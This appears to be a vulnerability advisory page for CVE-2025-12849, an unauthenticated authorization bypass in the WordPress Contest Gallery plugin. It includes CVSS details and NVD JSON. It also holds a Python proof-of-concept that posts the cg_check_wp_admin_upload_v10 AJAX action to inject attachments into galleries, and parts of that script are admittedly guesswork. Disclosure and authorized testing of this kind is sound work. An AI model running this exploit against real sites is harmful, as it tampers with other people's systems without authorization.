Security Vulnerability Report
中文
CVE-2025-12849 CVSS 5.3 MEDIUM

CVE-2025-12849

Published: 2025-11-15 07:15:43
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Contest Gallery plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 28.0.2. This is due to the plugin registering the `cg_check_wp_admin_upload_v10` AJAX action for both authenticated and unauthenticated users without implementing capability checks or nonce verification. This makes it possible for unauthenticated attackers to inject arbitrary WordPress media attachments into galleries and manipulate gallery metadata via the `cg_check_wp_admin_upload_v10` action. It does not enable an attacker to move or upload files.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

WordPress Contest Gallery插件 <= 28.0.2(所有版本)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import json # CVE-2025-12849 PoC - Contest Gallery Authorization Bypass # Target: WordPress site with Contest Gallery plugin <= 28.0.2 TARGET_URL = "http://target-wordpress-site.com" GALLERY_ID = 1 # Target gallery ID (enumeration required) ATTACHMENT_ID = 123 # Valid media attachment ID to inject def exploit_cg_auth_bypass(): """ Exploits the authorization bypass vulnerability in Contest Gallery plugin. This allows unauthenticated attackers to inject media attachments into galleries. """ endpoint = f"{TARGET_URL}/wp-admin/admin-ajax.php" # Build the exploit request data = { 'action': 'cg_check_wp_admin_upload_v10', 'gallery_id': GALLERY_ID, 'attachment_id': ATTACHMENT_ID, # Additional parameters may be required based on plugin version 'cg_step': 'insert_attachment', 'cg_override_gallery': 'true' } try: response = requests.post(endpoint, data=data, timeout=10) print(f"[*] Sending malicious request to {endpoint}") print(f"[*] Target Gallery ID: {GALLERY_ID}") print(f"[*] Attachment ID: {ATTACHMENT_ID}") print(f"[*] Response Status: {response.status_code}") if response.status_code == 200: print(f"[*] Response: {response.text[:500]}") # Check if injection was successful if 'success' in response.text.lower() or '1' in response.text: print("[+] Exploitation appears successful!") print("[+] Malicious attachment injected into gallery") else: print("[-] Response does not indicate successful exploitation") else: print(f"[-] Unexpected HTTP status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") if __name__ == "__main__": print("=" * 60) print("CVE-2025-12849 - Contest Gallery Auth Bypass Exploit") print("=" * 60) exploit_cg_auth_bypass()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12849", "sourceIdentifier": "[email protected]", "published": "2025-11-15T07:15:42.640", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Contest Gallery plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 28.0.2. This is due to the plugin registering the `cg_check_wp_admin_upload_v10` AJAX action for both authenticated and unauthenticated users without implementing capability checks or nonce verification. This makes it possible for unauthenticated attackers to inject arbitrary WordPress media attachments into galleries and manipulate gallery metadata via the `cg_check_wp_admin_upload_v10` action. It does not enable an attacker to move or upload files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/include-functions-v10.php#L42", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/include-functions-v10.php#L47", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/include-functions-v10.php#L64", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/v10-admin/gallery/wp-uploader.php#L15", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/contest-gallery/tags/28.0.2/v10/v10-admin/gallery/wp-uploader.php#L173", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/contest-gallery/#developers", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e000c4ad-43ec-4ad0-89f9-74e9e6d8b917?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.